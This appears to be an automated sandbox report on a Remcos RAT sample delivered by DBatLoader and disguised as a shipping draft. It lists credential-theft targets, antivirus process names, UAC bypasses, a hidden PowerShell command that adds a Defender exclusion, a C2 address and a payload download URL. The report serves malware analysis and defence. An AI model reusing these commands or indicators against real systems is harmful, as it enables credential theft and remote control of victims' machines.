Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	31_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	31_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	32_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	32_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	34_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	34_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	34_2_00007FF70CC76EE4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_40102264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_40102264

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B60D GetComputerNameExW,GetUserNameW,

0_2_2795B60D

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_279893AD

Source: C:\Users\Public\Libraries\glrkszlG.pif

Code function: 1_2_0040559A GetVersionExW,GetVersionExW,

1_2_0040559A

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Opens network shares

Source: C:\Users\Public\alpha.exe

File opened: \\Windows \

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: ESMTPPassword	37_2_004033F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	37_2_00402DB3
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	37_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7492, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.250.180.178	unknown	United States	9009	M247GB	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
dual-spov-0006.spov-msedge.net	13.107.139.11	true
geoplugin.net	178.237.33.50	true
onedrive.live.com	unknown	unknown
c6c4bq.db.files.1drv.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
104.250.180.178	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw"]}
Source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "104.250.180.178:7902:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "CorelDraw.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "CorelDraw-OW5ET7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: 104.250.180.178

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Glzskrlg.PIF

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Virustotal: Detection: 27%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Glzskrlg.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27973837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		0_2_27973837
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		36_2_00404423

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_358adb91-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\Public\ger.exe

Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

Uses 32bit PE files

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 